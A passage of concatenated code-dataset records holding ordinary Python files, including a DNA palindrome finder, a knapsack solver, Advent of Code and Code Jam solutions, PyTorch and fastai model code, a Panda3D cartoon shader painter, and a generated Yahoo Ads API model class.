times is in f\n# if f in k or f == \"\" :\n# print(\"True\")\n# else:\n# print(\"False\")\n\nif f in k or f == \"\" or list(set(f))[0] in k or f in [list(set(l))[0] for l in k]:\n print(\"True\")\nelse:\n print(\"False\")\n\n\n\n","repo_name":"DEVSOG12/ReproducibleTests","sub_path":"NPMTest/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6953506333","text":"# Locating Restriction Sites\n\nimport os\nimport sys\n\nfile = open(os.path.join(os.path.dirname(sys.argv[0]), 'rosalind_revp.txt'))\nlines = [line.rstrip('\\n') for line in file]\nlines.pop(0)\ndna = ''.join(lines)\n# dna = \"TCAATGCATGCGGGTCTATATGCAT\"\n\n# Create reverse complement of a DNA string\ndef reverse_complement(dna):\n reverse = dna[::-1]\n complement = \"\"\n for c in reverse:\n if c == \"A\":\n complement += \"T\"\n elif c == \"T\":\n complement += \"A\"\n elif c == \"C\":\n complement += \"G\"\n else:\n complement += \"C\"\n return complement\n\n# Palindrome\ndef palindrome_tester(dna):\n positions = []\n for i in range(0, len(dna)):\n # Range 4..12\n for x in range(12, 2, -2):\n strand = dna[i:i + x]\n length = len(strand)\n if length >= 4 and length % 2 == 0:\n prev = strand[0:int(length/2)]\n next = strand[int(length/2):]\n # print(prev + \" \" + next + \" \" + reverse_complement(next) + \" i:\" + str(i) + \" x:\" + str(x))\n if prev == reverse_complement(next):\n # print(prev + \" \" + reverse_complement(next) + \" i:\" + str(i + 1) + \" x:\" + str(x))\n positions.append([i + 1, length])\n break\n return positions\n\n# Find pos, length of reverse\npalindromes = palindrome_tester(dna)\nfor palindrome in palindromes:\n print(str(palindrome[0]) + \" \" + str(palindrome[1]))\n","repo_name":"sneakyweasel/DNA","sub_path":"REVP/REVP.py","file_name":"REVP.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"37283186394","text":"def knapsack(wt, val, w, n):\n table = [[0 for x in range(w+1)] for x in range(n+1)]\n\n for i in range(1,n+1):\n for j in range(1,w+1):\n if wt[i-1] <= j:\n table[i][j] = max(\n val[i-1] + table[i-1][j-wt[i-1]],\n table[i-1][j]\n )\n else:\n table[i][j] = table[i-1][j]\n cap = w\n print(table[n][w])\n for i in range(n,0,-1):\n if table[i-1][cap] != table[i][cap]:\n items.append(wt[i-1])\n cap = cap - wt[i-1]\n\nval = [40, 100, 50, 60]\nwt = [20, 10, 40, 30]\nw = 60\nn = len(wt)\nitems = []\nknapsack(wt, val, w, n)\nprint(items)\n","repo_name":"malikamakker/DataStructures","sub_path":"dynamic programming/knapsack_print_items.py","file_name":"knapsack_print_items.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17989771955","text":"# AoC 2020 Day 20b\n\ndef load_data():\n tiles = {}\n with open('example.txt', 'r') as infile:\n d = infile.read()\n for t in d.split('\\n\\n'):\n tile = t.split('\\n')\n tilename = tile[0][5:-1]\n tilesize = len(tile[1])\n top = tile[1]\n bottom = tile[tilesize]\n left = ''.join([x[0] for x in tile[1:]])\n right = ''.join([x[tilesize-1] for x in tile[1:]])\n tiles[tilename] = [top, right, bottom, left]\n return tiles\n\ndef find_match(tiles, curr_tile, side):\n for tile, sides in tiles.items():\n if tile != curr_tile:\n for s in sides:\n if s == side or s[::-1] == side:\n return True\n return False \n\ndef strip_borders(tile):\n newtile = []\n for rownum, row in enumerate(tile):\n if rownum not in [0, len(tile)]:\n newtile.append([tile[1:-1]])\n return newtile\n\ndef rotate_tile(tile):\n return [''.join(x) for x in list(zip(*tile[::-1]))]\n\ndef find_corners(tiles):\n corner_ids = 1\n sidematches = {x: 0 for x in tiles.keys()}\n\n for curr_tile, sides in tiles.items():\n for side in sides:\n if find_match(tiles, curr_tile, side):\n sidematches[curr_tile] += 1\n \n for k, v in sidematches.items():\n if v == 2:\n corner_ids *= int(k)\n return corner_ids\n\ndef main():\n test = ['#..', '...', '...']\n print(rotate_tile(test))\n #print(find_corners(load_data()))\n\nif __name__ == '__main__':\n main()\n","repo_name":"Azcobu/advent-of-code","sub_path":"2020/day20/aoc2020-20b.py","file_name":"aoc2020-20b.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36478413707","text":"# Pytorch\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torchvision import models\n\nimport pytorch_lightning as pl\nimport torchmetrics\n\n\nclass WoodLightningModule(pl.LightningModule):\n def __init__(self, model, num_classes, learning_rate=2 * 1e-4, use_pretrained=False, **kwargs):\n super().__init__()\n self.save_hyperparameters()\n self.learning_rate = learning_rate\n self.num_classes = num_classes\n self.use_pretrained = use_pretrained\n if use_pretrained:\n self.model = self.pretrained_model()\n else:\n self.model = model\n\n def pretrained_model(self):\n net_pretrained = models.resnet34(pretrained=True)\n # zamrożenie parametrów sieci\n for param in net_pretrained.parameters():\n param.requires_grad = False\n num_in_features = net_pretrained.fc.in_features # liczba cech wejściowych się nie zmienia, natomiast liczbę cech wyjściowych podmienimy na num_classes = 2\n net_pretrained.fc = nn.Linear(num_in_features,\n self.num_classes) # nadpisanie warstwy fc nową warstwą - w tym przykładzie tylko ta byłaby trenowana\n return net_pretrained\n\n def forward(self, x):\n return self.model(x)\n\n def compute_loss(self, x, y):\n return F.cross_entropy(x, y)\n\n def common_step(self, batch, batch_idx):\n x, y = batch\n outputs = self(x)\n loss = self.compute_loss(outputs, y)\n return loss, outputs, y\n\n def common_test_valid_step(self, batch, batch_idx):\n loss, outputs, y = self.common_step(batch, batch_idx)\n preds = torch.argmax(outputs, dim=1)\n acc = torchmetrics.functional.accuracy(preds, y, task=\"multiclass\", num_classes=self.num_classes)\n return loss, acc\n\n def training_step(self, batch, batch_idx):\n loss, acc = self.common_test_valid_step(batch, batch_idx)\n self.log('train_loss', loss, on_step=True, on_epoch=True, logger=True)\n self.log('train_acc', acc, on_step=True, on_epoch=True, logger=True)\n return loss\n\n def validation_step(self, batch, batch_idx):\n loss, acc = self.common_test_valid_step(batch, batch_idx)\n self.log('val_loss', loss, prog_bar=True)\n self.log('val_acc', acc, prog_bar=True)\n return loss\n\n def test_step(self, batch, batch_idx):\n loss, acc = self.common_test_valid_step(batch, batch_idx)\n self.log('test_loss', loss, prog_bar=True)\n self.log('test_acc', acc, prog_bar=True)\n return loss\n\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=self.learning_rate)\n return optimizer\n","repo_name":"Mikboch/wood-classification-DNN","sub_path":"src/wood-classification/modules/wood_lightning_module.py","file_name":"wood_lightning_module.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23421409321","text":"fl=file(\"B-large.in\",\"r\")\r\nfo=file(\"output.txt\",\"w\")\r\nt=int(fl.readline())\r\nfor i in xrange(t):\r\n s=fl.readline()\r\n c,f,x=map(float,s.split())\r\n time=0.0000000\r\n rate=2\r\n while True:\r\n if x/rate 0.0 else 0.0\n max = max if max > 0.0 else 0.0\n steps = steps if steps > 0.0 else 0.0\n if min > max: min = max\n \n self._stepf_min = min \n self._stepf_max = max\n self._stepf_steps = steps\n self.toon_render.setShaderInput('min', Vec4(self._stepf_min))\n self.toon_render.setShaderInput('max', Vec4(self._stepf_max))\n self.toon_render.setShaderInput('steps', Vec4(self._stepf_steps))\n\n def enable(self):\n \"\"\"Enable the cartoon painter.\"\"\"\n if self._shaders_supported:\n self._enabled = True\n \n def disable(self):\n \"\"\"Disable the cartoon painter. It will not undo nodepaths already\n painted.\n \"\"\"\n self._enabled = False\n \n def paint(self, nodepath):\n \"\"\"Paint a nodepath with cartoon shading and inking.\"\"\"\n if self._enabled:\n _inp = nodepath.instanceUnderNode(self.toon_render, nodepath.getName())\n _inp.setTag(self.CARTOON_SHADING_TAG, 'True')\n _inp.setTag(self.CARTOON_INKING_TAG, 'True')\n self._paintings[nodepath] = _inp\n nodepath.stash()\n \n def unpaint(self, nodepath):\n \"\"\"Undo cartoon painting on a nodepath.\"\"\"\n if self._enabled:\n if nodepath in self._paintings:\n _inp = self._paintings.pop(nodepath)\n _inp.removeNode()\n nodepath.unstash()\n \n def camera_spot_light(self, bool):\n \"\"\"Enable or disable camera spot light effect. When enabled the shader\n light will follow the camera movements.\n \"\"\"\n self._camera_spot_light = bool\n \n separation = property(get_separation, set_separation)\n cutoff = property(get_cutoff, set_cutoff)","repo_name":"cla101/Cartoon-Painter","sub_path":"cartoonpainter/cartoonpainter.py","file_name":"cartoonpainter.py","file_ext":"py","file_size_in_byte":11433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29326478491","text":"from fastai.vision import *\nfrom helper.object_detection_helper import *\nfrom loss.RetinaNetFocalLoss import RetinaNetFocalLoss\nfrom models.RetinaNet import RetinaNet\nimport locale\n\nlocale.setlocale(locale.LC_ALL, 'C')\nimport numpy as np\nimport torch\nimport torchvision.models as models\nimport torchvision\n\nclass ModelLoader:\n def __init__(self):\n anchor_sizes = [(32, 32), (16, 16)]\n anchor_ratios = [1.4, 1.2, 1, 0.8, 0.6]\n anchor_scales = [0.3, 0.4, 0.6, 0.8, 1, 1.2]\n n_anch = len(anchor_ratios) * len(anchor_scales)\n anchors = create_anchors(sizes=anchor_sizes, ratios=anchor_ratios, scales=anchor_scales)\n\n n_classes = 2\n crit = RetinaNetFocalLoss(anchors)\n encoder = create_body(models.resnet18, True, -2)\n self.model = RetinaNet(encoder, n_classes=n_classes, n_anchors=n_anch, sizes=[32, 16], chs=32, final_bias=-4.,\n n_conv=2)\n state_dic = torch.load('./round2_pretraining2.pth', map_location=torch.device('cpu'))\n self.model.load_state_dict(state_dic['model'])\n self.model.eval()\n\n def infer(self, image, context, detect_thresh: float = 0.2, nms_thresh: float = 0.3):\n anchor_sizes = [(32, 32), (16, 16)]\n anchor_ratios = [1.4, 1.2, 1, 0.8, 0.6]\n anchor_scales = [0.3, 0.4, 0.6, 0.8, 1, 1.2]\n n_anch = len(anchor_ratios) * len(anchor_scales)\n anchors = create_anchors(sizes=anchor_sizes, ratios=anchor_ratios, scales=anchor_scales)\n\n with torch.no_grad():\n context.logger.info(f\"Input image: {image.size()}\")\n in_img = torch.load('./tensor.pt')\n context.logger.info(f\"in_img size: {in_img.size()}\")\n context.logger.info(f\"in_img: {in_img}\")\n\n context.logger.info(f\"image size: {image.size()}\")\n context.logger.info(f\"image: {image}\")\n\n test_prediction = self.model(image)\n class_pred_im, bbox_pred_im = test_prediction[:2]\n context.logger.info(f\"Prediction output: {len(bbox_pred_im)}\")\n\n context.logger.info(f\"Starting process_output2\")\n bbox_pred, scores, preds, detect_count = self.process_output2(\n clas_pred=class_pred_im,\n bbox_pred=bbox_pred_im,\n anchors=anchors)\n context.logger.info(f\"detect_count: {len(detect_count)}\")\n bbox_preds = []\n start = 0\n for i in detect_count:\n bbox_pred_i = bbox_pred[start:start + i]\n scores_i = scores[start:start + i]\n preds_i = preds[start:start + i]\n bbox_preds.append(self.filter_slices(bbox_pred_i, scores_i, preds_i, nms_thresh, context))\n start += i\n context.logger.info(f\"return bbox_preds: {len(bbox_preds)}\")\n return bbox_preds\n\n def process_output2(self, clas_pred, bbox_pred, anchors):\n detect_thresh = 0.25\n bbox_pred = activ_to_bbox(bbox_pred, anchors)\n clas_pred = torch.sigmoid(clas_pred)\n detect_mask = clas_pred.max(2)[0] > detect_thresh\n detect_count = torch.sum(detect_mask, 1)\n\n if np.array(detect_mask).max() == 0:\n return None, None, None\n\n bbox_pred, clas_pred = bbox_pred[detect_mask], clas_pred[detect_mask]\n\n bbox_pred = tlbr2cthw(torch.clamp(cthw2tlbr(bbox_pred), min=-1, max=1))\n\n scores, preds = clas_pred.max(1)\n\n return bbox_pred, scores, preds, detect_count\n\n def filter_slices(self, bbox_pred, scores, preds, nms_thresh, context):\n if bbox_pred is not None:\n to_keep = nms(bbox_pred, scores, context=context, thresh=nms_thresh)\n #to_keep = torchvision.ops.nms(bbox_pred, scores, nms_thresh)\n\n bbox_pred, preds, scores = bbox_pred[to_keep].cpu(), preds[to_keep].cpu(), scores[to_keep].cpu()\n t_sz = torch.Tensor([256, 256])[None].cpu()\n if bbox_pred is not None:\n bbox_pred = to_np(rescale_boxes(bbox_pred, t_sz))\n # change from center to top left\n bbox_pred[:, :2] = bbox_pred[:, :2] - bbox_pred[:, 2:] / 2\n\n return bbox_pred\n","repo_name":"symbols-and-patterns/medieval-texts-detection-cvat-plugin","sub_path":"pismena/nuclio/model_loader.py","file_name":"model_loader.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24017548297","text":"from ..core import Feature, TextEngine\nfrom ..internal import chelly_property, ChellyFollowedValue\nfrom qtpy.QtGui import QImage, QPainter\nfrom qtpy.QtCore import QPoint, QSize\nfrom typing import Any, Optional\nfrom typing_extensions import Self\n\n\nclass ImageDrawer(Feature):\n def __init__(self, editor):\n super().__init__(editor)\n self.__qimage_to_paint = None\n self.editor.on_painted.connect(self.paint)\n\n def paint(self, paint_event):\n if not isinstance(self.__qimage_to_paint, QImage):\n return None\n\n with QPainter(self.editor.viewport()) as painter:\n x_offset = self.editor.contentOffset().x()\n viewport_size = self.editor.viewport().size()\n drawable_x = viewport_size.width() - x_offset\n drawable_y = viewport_size.height()\n\n painter.drawImage(\n QPoint(0, 0),\n self.__qimage_to_paint.scaled(QSize(drawable_x, drawable_y)),\n )\n\n @chelly_property\n def draw(self) -> Optional[QImage]:\n return self.__qimage_to_paint\n\n @draw.setter\n def draw(self, qimage: Optional[QImage]):\n self.__qimage_to_paint = qimage\n\n @draw.deleter\n def draw(self):\n self.__qimage_to_paint = None\n\n @draw.follower\n def draw(self, origin: Self, value: Any):\n for editor in self.editor.followers:\n editor_follower_image_drawer = editor.features.get(ImageDrawer)\n if editor_follower_image_drawer is None:\n continue\n editor_follower_image_drawer.draw = ChellyFollowedValue(value)\n\n\n__all__ = [\"ImageDrawer\"]\n","repo_name":"IgdaliasCabamba/chelly","sub_path":"chelly/features/drawer.py","file_name":"drawer.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"39403293818","text":"# coding: utf-8\n\n\"\"\"\n Yahoo!広告 検索広告 API リファレンス / Yahoo! Ads Search Ads API Reference\n\n
Yahoo!広告 検索広告 APIのWebサービスについて説明します。
「Try it out」のご利用には、事前にアプリケーションの登録が必要です。また、アプリケーションのリダイレクトURIの1つに
https://yahoojp-marketing.github.io/ads-search-api-documents/oauth2-redirect.htmlを登録してください。
Search Ads API Web Services supported in Yahoo! Ads API.
When you use \\\"Try it out\\\", you need to register your application in advance.
As one of redirect URI for application, you need to set \\\"https://yahoojp-marketing.github.io/ads-search-api-documents/oauth2-redirect.html\\\".
# noqa: E501\n\n The version of the OpenAPI document: v1\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom yahoo_ads_search.configuration import Configuration\n\n\nclass FeedItem(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'account_id': 'int',\n 'approval_status': 'FeedItemServiceApprovalStatus',\n 'custom_parameters': 'FeedItemServiceCustomParameters',\n 'device_preference': 'FeedItemServiceDevicePreference',\n 'disapproval_reason_codes': 'list[str]',\n 'end_date': 'str',\n 'feed_id': 'int',\n 'feed_item_attribute': 'list[FeedItemServiceAttribute]',\n 'feed_item_id': 'int',\n 'feed_item_track_id': 'int',\n 'invalided_trademarks': 'list[str]',\n 'location': 'FeedItemServiceLocation',\n 'placeholder_type': 'FeedItemServicePlaceholderType',\n 'review_custom_parameters': 'FeedItemServiceCustomParameters',\n 'scheduling': 'FeedItemServiceScheduling',\n 'start_date': 'str',\n 'targeting_ad_group': 'FeedItemServiceTargetingAdGroup',\n 'targeting_campaign': 'FeedItemServiceTargetingCampaign',\n 'targeting_keyword': 'FeedItemServiceTargetingKeyword',\n 'trademark_status': 'FeedItemServiceTrademarkStatus'\n }\n\n attribute_map = {\n 'account_id': 'accountId',\n 'approval_status': 'approvalStatus',\n 'custom_parameters': 'customParameters',\n 'device_preference': 'devicePreference',\n 'disapproval_reason_codes': 'disapprovalReasonCodes',\n 'end_date': 'endDate',\n 'feed_id': 'feedId',\n 'feed_item_attribute': 'feedItemAttribute',\n 'feed_item_id': 'feedItemId',\n 'feed_item_track_id': 'feedItemTrackId',\n 'invalided_trademarks': 'invalidedTrademarks',\n 'location': 'location',\n 'placeholder_type': 'placeholderType',\n 'review_custom_parameters': 'reviewCustomParameters',\n 'scheduling': 'scheduling',\n 'start_date': 'startDate',\n 'targeting_ad_group': 'targetingAdGroup',\n 'targeting_campaign': 'targetingCampaign',\n 'targeting_keyword': 'targetingKeyword',\n 'trademark_status': 'trademarkStatus'\n }\n\n def __init__(self, account_id=None, approval_status=None, custom_parameters=None, device_preference=None, disapproval_reason_codes=None, end_date=None, feed_id=None, feed_item_attribute=None, feed_item_id=None, feed_item_track_id=None, invalided_trademarks=None, location=None, placeholder_type=None, review_custom_parameters=None, scheduling=None, start_date=None, targeting_ad_group=None, targeting_campaign=None, targeting_keyword=None, trademark_status=None, local_vars_configuration=None): # noqa: E501\n \"\"\"FeedItem - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._account_id = None\n self._approval_status = None\n self._custom_parameters = None\n self._device_preference = None\n self._disapproval_reason_codes = None\n self._end_date = None\n self._feed_id = None\n self._feed_item_attribute = None\n self._feed_item_id = None\n self._feed_item_track_id = None\n self._invalided_trademarks = None\n self._location = None\n self._placeholder_type = None\n self._review_custom_parameters = None\n self._scheduling = None\n self._start_date = None\n self._targeting_ad_group = None\n self._targeting_campaign = None\n self._targeting_keyword = None\n self._trademark_status = None\n self.discriminator = None\n\n self.account_id = account_id\n self.approval_status = approval_status\n self.custom_parameters = custom_parameters\n self.device_preference = device_preference\n self.disapproval_reason_codes = disapproval_reason_codes\n self.end_date = end_date\n self.feed_id = feed_id\n self.feed_item_attribute = feed_item_attribute\n self.feed_item_id = feed_item_id\n self.feed_item_track_id = feed_item_track_id\n self.invalided_trademarks = invalided_trademarks\n self.location = location\n self.placeholder_type = placeholder_type\n self.review_custom_parameters = review_custom_parameters\n self.scheduling = scheduling\n self.start_date = start_date\n self.targeting_ad_group = targeting_ad_group\n self.targeting_campaign = targeting_campaign\n self.targeting_keyword = targeting_keyword\n self.trademark_status = trademark_status\n\n @property\n def account_id(self):\n \"\"\"Gets the account_id of this FeedItem. # noqa: E501\n\n
アカウントIDです。
このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。
Account ID.
Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :return: The account_id of this FeedItem. # noqa: E501\n :rtype: int\n \"\"\"\n return self._account_id\n\n @account_id.setter\n def account_id(self, account_id):\n \"\"\"Sets the account_id of this FeedItem.\n\n
アカウントIDです。
このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。
Account ID.
Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :param account_id: The account_id of this FeedItem. # noqa: E501\n :type: int\n \"\"\"\n\n self._account_id = account_id\n\n @property\n def approval_status(self):\n \"\"\"Gets the approval_status of this FeedItem. # noqa: E501\n\n\n :return: The approval_status of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceApprovalStatus\n \"\"\"\n return self._approval_status\n\n @approval_status.setter\n def approval_status(self, approval_status):\n \"\"\"Sets the approval_status of this FeedItem.\n\n\n :param approval_status: The approval_status of this FeedItem. # noqa: E501\n :type: FeedItemServiceApprovalStatus\n \"\"\"\n\n self._approval_status = approval_status\n\n @property\n def custom_parameters(self):\n \"\"\"Gets the custom_parameters of this FeedItem. # noqa: E501\n\n\n :return: The custom_parameters of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceCustomParameters\n \"\"\"\n return self._custom_parameters\n\n @custom_parameters.setter\n def custom_parameters(self, custom_parameters):\n \"\"\"Sets the custom_parameters of this FeedItem.\n\n\n :param custom_parameters: The custom_parameters of this FeedItem. # noqa: E501\n :type: FeedItemServiceCustomParameters\n \"\"\"\n\n self._custom_parameters = custom_parameters\n\n @property\n def device_preference(self):\n \"\"\"Gets the device_preference of this FeedItem. # noqa: E501\n\n\n :return: The device_preference of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceDevicePreference\n \"\"\"\n return self._device_preference\n\n @device_preference.setter\n def device_preference(self, device_preference):\n \"\"\"Sets the device_preference of this FeedItem.\n\n\n :param device_preference: The device_preference of this FeedItem. # noqa: E501\n :type: FeedItemServiceDevicePreference\n \"\"\"\n\n self._device_preference = device_preference\n\n @property\n def disapproval_reason_codes(self):\n \"\"\"Gets the disapproval_reason_codes of this FeedItem. # noqa: E501\n\n
審査否認理由です。
このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。
Reject reason on editorial review.
Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :return: The disapproval_reason_codes of this FeedItem. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._disapproval_reason_codes\n\n @disapproval_reason_codes.setter\n def disapproval_reason_codes(self, disapproval_reason_codes):\n \"\"\"Sets the disapproval_reason_codes of this FeedItem.\n\n
審査否認理由です。
このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。
Reject reason on editorial review.
Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :param disapproval_reason_codes: The disapproval_reason_codes of this FeedItem. # noqa: E501\n :type: list[str]\n \"\"\"\n\n self._disapproval_reason_codes = disapproval_reason_codes\n\n @property\n def end_date(self):\n \"\"\"Gets the end_date of this FeedItem. # noqa: E501\n\n
配信終了日です。
※空で設定すると、既存の配信終了日は削除されます。
このフィールドは、ADDおよびSET時に省略可能となり、REMOVE時に無視されます。
End date of ad display.
∗By setting blank, existing end date of ad display will be deleted.
This field is optional in ADD and SET operation, and will be ignored in REMOVE operation.
# noqa: E501\n\n :return: The end_date of this FeedItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._end_date\n\n @end_date.setter\n def end_date(self, end_date):\n \"\"\"Sets the end_date of this FeedItem.\n\n
配信終了日です。
※空で設定すると、既存の配信終了日は削除されます。
このフィールドは、ADDおよびSET時に省略可能となり、REMOVE時に無視されます。
End date of ad display.
∗By setting blank, existing end date of ad display will be deleted.
This field is optional in ADD and SET operation, and will be ignored in REMOVE operation.
# noqa: E501\n\n :param end_date: The end_date of this FeedItem. # noqa: E501\n :type: str\n \"\"\"\n\n self._end_date = end_date\n\n @property\n def feed_id(self):\n \"\"\"Gets the feed_id of this FeedItem. # noqa: E501\n\n
フィードIDです。
このフィールドはレスポンスの際に返却されますが、リクエストの際には無視されます。
※アドカスタマイザーの場合は、ADD時に必須となります。
Feed ID.
Although this field will be returned in the response, it will be ignored on input.
*For AD_CUSTOMIZER, this field is required in ADD operation.
# noqa: E501\n\n :return: The feed_id of this FeedItem. # noqa: E501\n :rtype: int\n \"\"\"\n return self._feed_id\n\n @feed_id.setter\n def feed_id(self, feed_id):\n \"\"\"Sets the feed_id of this FeedItem.\n\n
フィードIDです。
このフィールドはレスポンスの際に返却されますが、リクエストの際には無視されます。
※アドカスタマイザーの場合は、ADD時に必須となります。
Feed ID.
Although this field will be returned in the response, it will be ignored on input.
*For AD_CUSTOMIZER, this field is required in ADD operation.
# noqa: E501\n\n :param feed_id: The feed_id of this FeedItem. # noqa: E501\n :type: int\n \"\"\"\n\n self._feed_id = feed_id\n\n @property\n def feed_item_attribute(self):\n \"\"\"Gets the feed_item_attribute of this FeedItem. # noqa: E501\n\n\n :return: The feed_item_attribute of this FeedItem. # noqa: E501\n :rtype: list[FeedItemServiceAttribute]\n \"\"\"\n return self._feed_item_attribute\n\n @feed_item_attribute.setter\n def feed_item_attribute(self, feed_item_attribute):\n \"\"\"Sets the feed_item_attribute of this FeedItem.\n\n\n :param feed_item_attribute: The feed_item_attribute of this FeedItem. # noqa: E501\n :type: list[FeedItemServiceAttribute]\n \"\"\"\n\n self._feed_item_attribute = feed_item_attribute\n\n @property\n def feed_item_id(self):\n \"\"\"Gets the feed_item_id of this FeedItem. # noqa: E501\n\n
フィードアイテムIDです。
このフィールドは、SETおよびREMOVE時に必須となり、ADD時に無視されます。
Feed Item ID.
This field is required in SET and REMOVE operation, and will be ignored in ADD operation.
# noqa: E501\n\n :return: The feed_item_id of this FeedItem. # noqa: E501\n :rtype: int\n \"\"\"\n return self._feed_item_id\n\n @feed_item_id.setter\n def feed_item_id(self, feed_item_id):\n \"\"\"Sets the feed_item_id of this FeedItem.\n\n
フィードアイテムIDです。
このフィールドは、SETおよびREMOVE時に必須となり、ADD時に無視されます。
Feed Item ID.
This field is required in SET and REMOVE operation, and will be ignored in ADD operation.
# noqa: E501\n\n :param feed_item_id: The feed_item_id of this FeedItem. # noqa: E501\n :type: int\n \"\"\"\n\n self._feed_item_id = feed_item_id\n\n @property\n def feed_item_track_id(self):\n \"\"\"Gets the feed_item_track_id of this FeedItem. # noqa: E501\n\n
トラッキング用フィードアイテムIDです。
このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。
Feed Item ID for tracking.
Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :return: The feed_item_track_id of this FeedItem. # noqa: E501\n :rtype: int\n \"\"\"\n return self._feed_item_track_id\n\n @feed_item_track_id.setter\n def feed_item_track_id(self, feed_item_track_id):\n \"\"\"Sets the feed_item_track_id of this FeedItem.\n\n
トラッキング用フィードアイテムIDです。
このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。
Feed Item ID for tracking.
Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :param feed_item_track_id: The feed_item_track_id of this FeedItem. # noqa: E501\n :type: int\n \"\"\"\n\n self._feed_item_track_id = feed_item_track_id\n\n @property\n def invalided_trademarks(self):\n \"\"\"Gets the invalided_trademarks of this FeedItem. # noqa: E501\n\n
制限された商標です。
このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。
Invalided trademarks.
Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :return: The invalided_trademarks of this FeedItem. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._invalided_trademarks\n\n @invalided_trademarks.setter\n def invalided_trademarks(self, invalided_trademarks):\n \"\"\"Sets the invalided_trademarks of this FeedItem.\n\n
制限された商標です。
このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。
Invalided trademarks.
Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :param invalided_trademarks: The invalided_trademarks of this FeedItem. # noqa: E501\n :type: list[str]\n \"\"\"\n\n self._invalided_trademarks = invalided_trademarks\n\n @property\n def location(self):\n \"\"\"Gets the location of this FeedItem. # noqa: E501\n\n\n :return: The location of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceLocation\n \"\"\"\n return self._location\n\n @location.setter\n def location(self, location):\n \"\"\"Sets the location of this FeedItem.\n\n\n :param location: The location of this FeedItem. # noqa: E501\n :type: FeedItemServiceLocation\n \"\"\"\n\n self._location = location\n\n @property\n def placeholder_type(self):\n \"\"\"Gets the placeholder_type of this FeedItem. # noqa: E501\n\n\n :return: The placeholder_type of this FeedItem. # noqa: E501\n :rtype: FeedItemServicePlaceholderType\n \"\"\"\n return self._placeholder_type\n\n @placeholder_type.setter\n def placeholder_type(self, placeholder_type):\n \"\"\"Sets the placeholder_type of this FeedItem.\n\n\n :param placeholder_type: The placeholder_type of this FeedItem. # noqa: E501\n :type: FeedItemServicePlaceholderType\n \"\"\"\n\n self._placeholder_type = placeholder_type\n\n @property\n def review_custom_parameters(self):\n \"\"\"Gets the review_custom_parameters of this FeedItem. # noqa: E501\n\n\n :return: The review_custom_parameters of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceCustomParameters\n \"\"\"\n return self._review_custom_parameters\n\n @review_custom_parameters.setter\n def review_custom_parameters(self, review_custom_parameters):\n \"\"\"Sets the review_custom_parameters of this FeedItem.\n\n\n :param review_custom_parameters: The review_custom_parameters of this FeedItem. # noqa: E501\n :type: FeedItemServiceCustomParameters\n \"\"\"\n\n self._review_custom_parameters = review_custom_parameters\n\n @property\n def scheduling(self):\n \"\"\"Gets the scheduling of this FeedItem. # noqa: E501\n\n\n :return: The scheduling of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceScheduling\n \"\"\"\n return self._scheduling\n\n @scheduling.setter\n def scheduling(self, scheduling):\n \"\"\"Sets the scheduling of this FeedItem.\n\n\n :param scheduling: The scheduling of this FeedItem. # noqa: E501\n :type: FeedItemServiceScheduling\n \"\"\"\n\n self._scheduling = scheduling\n\n @property\n def start_date(self):\n \"\"\"Gets the start_date of this FeedItem. # noqa: E501\n\n
配信開始日です。
※空で設定すると、既存の配信開始日は削除されます。
このフィールドは、ADDおよびSET時に省略可能となり、REMOVE時に無視されます。
Start date of ad display
∗On setting blank, existing start date of ad display will be deleted.
